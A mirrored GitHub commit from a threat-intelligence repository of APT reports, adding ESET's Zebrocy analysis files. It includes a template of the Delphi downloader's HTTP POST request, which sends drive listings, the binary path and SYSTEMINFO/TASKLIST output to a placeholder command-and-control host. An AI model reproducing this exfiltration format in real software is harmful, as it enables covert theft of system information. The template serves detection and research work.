mirror of
https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections
synced 2024-06-24 07:49:57 +00:00
2018.04.24.sednit-update-analysis-zebrocy
This commit is contained in:
parent
00614bb5b1
commit
d94c6fcbae
19
2018/2018.04.24.sednit-update-analysis-zebrocy/Delphi_downloader_HTTP_POST_request.txt
Normal file
19
2018/2018.04.24.sednit-update-analysis-zebrocy/Delphi_downloader_HTTP_POST_request.txt
Normal file
@ -0,0 +1,19 @@
|
||||
POST (\/[a-zA-Z0-9\-\_\^\.]*){3}\.(php|dat)?fort=<SerialNumber_C> HTTP/1.0
|
||||
|
||||
Connection: keep-alive
|
||||
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
Content-Length: xxxx
|
||||
|
||||
Host: <ip_address>
|
||||
|
||||
Accept: text/html, */*
|
||||
|
||||
Accept-Encoding: identity
|
||||
|
||||
User-Agent: Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1
|
||||
|
||||
pol=MM/DD/YYYY%20HH:MM:SS%20(AM|PM)%0D%0A<DriveListing>%0D%0A%0D%0A<Path_to_the_binary>%0D%0A%0D%0A<SYSTEMINFO & TASKLIST output>
|
||||
|
||||
[...]
|
Binary file not shown.
@ -16,7 +16,8 @@ Please fire issue to me if any lost APT/Malware events/campaigns.
|
||||
|
||||
|
||||
## 2018
|
||||
* Apr 23 - [[Kaspersky] Energetic Bear/Crouching Yeti: attacks on servers](https://securelist.com/energetic-bear-crouching-yeti/85345/) | [Local](../../blob/master/2018/2018.04.12.operation-parliament)
|
||||
* Apr 24 - [[ESET] Sednit update: Analysis of Zebrocy](https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/) | [Local](../../blob/master/2018/2018.04.24.sednit-update-analysis-zebrocy)
|
||||
* Apr 23 - [[Kaspersky] Energetic Bear/Crouching Yeti: attacks on servers](https://securelist.com/energetic-bear-crouching-yeti/85345/) | [Local](../../blob/master/2018/2018.04.23.energetic-bear-crouching-yeti)
|
||||
* Apr 12 - [[Kaspersky] Operation Parliament, who is doing what?](https://securelist.com/operation-parliament-who-is-doing-what/85237/) | [Local](../../blob/master/2018/2018.04.12.operation-parliament)
|
||||
* Apr 04 - [[Trend Micro] New MacOS Backdoor Linked to OceanLotus Found](https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/) | [Local](../../blob/master/2018/2018.04.04.MacOS_Backdoor_OceanLotus)
|
||||
* Mar 29 - [[Trend Micro] ChessMaster Adds Updated Tools to Its Arsenal](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/) | [Local](../../blob/master/2018/2018.03.29.ChessMaster_Adds_Updated_Tools)
|
||||
|
Loading…
Reference in New Issue
Block a user